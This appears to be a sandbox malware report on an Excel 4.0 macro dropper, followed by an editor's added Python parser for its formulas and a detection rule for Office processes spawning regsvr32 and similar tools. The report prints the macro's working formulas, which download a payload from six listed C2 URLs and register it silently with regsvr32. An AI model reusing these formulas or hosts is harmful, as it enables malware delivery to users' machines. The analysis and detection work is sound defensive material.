General

  • Target

    232a7623140beefd90a9a7e56b39f54746ef3c446647e8f6f20a08726ea1aa4f

  • Size

    40KB

  • Sample

    241120-s5q6dsypcs

  • MD5

    30d3ff23cf32a50b15d75fe6c085f048

  • SHA1

    87154e8476118b45c667634196e19205b64b30e9

  • SHA256

    232a7623140beefd90a9a7e56b39f54746ef3c446647e8f6f20a08726ea1aa4f

  • SHA512

    f29b661910afb0c685f04bfcc5d52f0ce2734c62bb23cce2ef116832ac55a4cc8c0c3bbfb583c62ef0a0713dcde2e61d917d1cb325faa392a65c11bc58554be1

  • SSDEEP

    768:oPnCsqi1O3mnHzyKfcrND59V+L9Rw4eWrXcTqy0Fy:mnC5iymTylND59V4jwmXc2XFy

Score
10/10

Malware Config

Extracted

Rule: Excel 4.0 XLM Macro

C2

http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/

http://totalplaytuxtla.com/sitio/tEMOwWRh/

http://meca-global.com/wp-admin/zpM6L8KXY0H/

http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/

http://51.222.72.232/wp-includes/3ztqctcYr/

http://51.222.72.233/wp-includes/Xi60QX9khe/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/","..\xda.ocx",0,0)
    =IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/tEMOwWRh/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/wp-admin/zpM6L8KXY0H/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.232/wp-includes/3ztqctcYr/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.233/wp-includes/Xi60QX9khe/","..\xda.ocx",0,0))
    =IF('EFEGVE'!F22<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx")
    =RETURN()
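
The download chain above, as a worked parser. This is an added example, not part of the sandbox report or of any Triage tooling: the formula text is copied from the report's "formulas" attribute, while the parsing logic and the names FORMULAS, split_args, extract_func and parse_xlm_dropper are the editor's own. It recovers the URL fallback order, the drop path and the command that is finally executed.

```python
"""Pull the download chain out of the XLM formulas shown in this report.

Added example (not the sandbox's own code). The formulas are copied from the
report; the parsing logic and function names are the editor's own and are not
Triage or Excel APIs.
"""
import re

# Constructed input: the report's formulas, one cell per line. A raw string
# keeps "\xda.ocx" a literal Windows path instead of a Python escape.
FORMULAS_TEXT = r'''
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/","..\xda.ocx",0,0)
=IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/tEMOwWRh/","..\xda.ocx",0,0))
=IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/wp-admin/zpM6L8KXY0H/","..\xda.ocx",0,0))
=IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/","..\xda.ocx",0,0))
=IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.232/wp-includes/3ztqctcYr/","..\xda.ocx",0,0))
=IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.233/wp-includes/Xi60QX9khe/","..\xda.ocx",0,0))
=IF('EFEGVE'!F22<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx")
=RETURN()
'''
FORMULAS = FORMULAS_TEXT.strip().splitlines()


def split_args(text):
    """Split an XLM argument list on commas that sit outside double quotes.

    XLM strings have no backslash escapes (a literal quote is written as "");
    none of the report's formulas use one, so "" is left untouched here.
    """
    args, cur, in_str = [], [], False
    for ch in text:
        if ch == '"':
            in_str = not in_str
        elif ch == "," and not in_str:
            args.append("".join(cur))
            cur = []
            continue
        cur.append(ch)
    args.append("".join(cur))
    return [a.strip().strip('"') for a in args]


def extract_func(formula, name):
    """Return the argument list of the first NAME(...) in a formula, or None.

    The closing parenthesis is found with quote awareness so that a CALL nested
    inside IF(...) is cut at its own ')' and not at the IF's.
    """
    m = re.search(r"\b" + re.escape(name) + r"\(", formula)
    if not m:
        return None
    depth, in_str, start = 0, False, m.end()
    for i in range(start, len(formula)):
        ch = formula[i]
        if ch == '"':
            in_str = not in_str
        elif in_str:
            continue
        elif ch == "(":
            depth += 1
        elif ch == ")":
            if depth == 0:
                return split_args(formula[start:i])
            depth -= 1
    return None  # unbalanced parentheses


def parse_xlm_dropper(formulas):
    """Walk the cells in order and collect what the dropper does."""
    out = {"urls": [], "drop_paths": [], "exec": [], "guarded_steps": 0,
           "closes_on_failure": False}
    for f in formulas:
        # Each fallback is wrapped as IF(<cell holding previous CALL result><0, ...).
        # URLDownloadToFileA returns an HRESULT; failure codes have the high bit
        # set, so they read as negative in the cell and the next mirror is tried.
        if re.match(r"=IF\([^,]*<0,", f):
            out["guarded_steps"] += 1
        args = extract_func(f, "CALL")
        if args and len(args) >= 6 and args[0].lower() == "urlmon" \
                and args[1] == "URLDownloadToFileA":
            out["urls"].append(args[4])            # szURL
            if args[5] not in out["drop_paths"]:
                out["drop_paths"].append(args[5])  # szFileName
        ex = extract_func(f, "EXEC")
        if ex:
            out["exec"].append(ex[0])
        if extract_func(f, "CLOSE") is not None:
            out["closes_on_failure"] = True      # bail out quietly if all fail
    return out


if __name__ == "__main__":
    r = parse_xlm_dropper(FORMULAS)
    print("download mirrors, tried in order until one succeeds:")
    for u in r["urls"]:
        print("   ", u)
    print("dropped to", r["drop_paths"], "then", r["exec"])
```

Read together, the formulas are a six-mirror download with a fail-over: only when the previous URLDownloadToFileA result is negative is the next URL tried, all writing to the same ..\xda.ocx (a path relative to Excel's working directory). If the sixth download also fails, CLOSE(0) shuts the workbook without saving and nothing runs; otherwise regsvr32 -s loads the dropped file silently.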

Extracted

  Language    Source          URLs
  xlm4.0      xlm40.dropper   http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/
              xlm40.dropper   http://totalplaytuxtla.com/sitio/tEMOwWRh/
              xlm40.dropper   http://meca-global.com/wp-admin/zpM6L8KXY0H/

Targets

    • Target

      232a7623140beefd90a9a7e56b39f54746ef3c446647e8f6f20a08726ea1aa4f

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro. Here the XLM macro has Excel launch C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx to register the downloaded payload (see the formulas above).
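
Detection logic for the behaviour this signature describes, as an added example (not Triage's own signature implementation): an Office parent spawning a LOLBin child, with the severity raised when regsvr32 or rundll32 is handed a module outside Windows or Program Files, as with ..\xda.ocx here. The event records are constructed to resemble Sysmon Event ID 1 fields; the process lists, severities and the names evaluate, module_path and scan are the editor's choices, not a published rule.

```python
"""Flag Office parents spawning LOLBins, the behaviour behind the report's
"Process spawned unexpected child process" signature.

Added example, not Triage's own signature logic. The events below are
constructed to resemble Sysmon Event ID 1 fields (ParentImage, Image,
CommandLine, CurrentDirectory); the lists and severities are the editor's.
"""
import ntpath

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Children an Office application never needs for ordinary document work.
LOLBIN_CHILDREN = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
                   "cscript.exe", "powershell.exe", "cmd.exe", "certutil.exe"}
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\",
                "c:\\program files (x86)\\")


def _tokens(cmdline):
    """Split a Windows command line on whitespace outside double quotes."""
    toks, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                toks.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        toks.append("".join(cur))
    return toks


def module_path(cmdline, cwd=""):
    """For regsvr32/rundll32: the module argument (first non-switch token after
    the image), resolved against the process's working directory, lower-cased."""
    for tok in _tokens(cmdline)[1:]:
        if not tok.startswith(("-", "/")):
            return ntpath.normpath(ntpath.join(cwd, tok)).lower()
    return None


def evaluate(event):
    """Return (severity, reason) for a suspicious parent/child pair, else None."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    child = ntpath.basename(event["Image"]).lower()
    if parent not in OFFICE_PARENTS or child not in LOLBIN_CHILDREN:
        return None
    reason = "%s spawned %s" % (parent, child)
    if child in ("regsvr32.exe", "rundll32.exe"):
        mod = module_path(event["CommandLine"], event.get("CurrentDirectory", ""))
        # A module outside Windows/Program Files (e.g. ..\xda.ocx resolved into the
        # user's profile) is the dropper pattern; an add-in installer registering
        # a COM server from Program Files is only worth a look.
        if mod and not mod.startswith(TRUSTED_DIRS):
            return ("high", reason + " loading " + mod + " from an untrusted path")
    return ("medium", reason)


# Constructed events, not from the sandbox run.
EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx",
     "CurrentDirectory": r"C:\Users\bob\Documents"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\addin.ocx"',
     "CurrentDirectory": r"C:\Windows\System32"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Temp\tool.dll"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -File C:\Users\bob\AppData\Local\Temp\run.ps1"},
]


def scan(events):
    """Evaluate every event and return the hits as (index, severity, reason)."""
    hits = []
    for i, ev in enumerate(events):
        verdict = evaluate(ev)
        if verdict:
            hits.append((i,) + verdict)
    return hits


if __name__ == "__main__":
    for hit in scan(EVENTS):
        print("event %d [%s]: %s" % hit)
```

The working-directory join matters: the report's command line only says ..\xda.ocx, and it is the resolved path (here under the user's profile) that separates this from a vendor add-in registering a control from Program Files. The splwow64.exe child is left alone on purpose; Office spawns it for printing, so a rule that fires on every child would drown the regsvr32 case.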
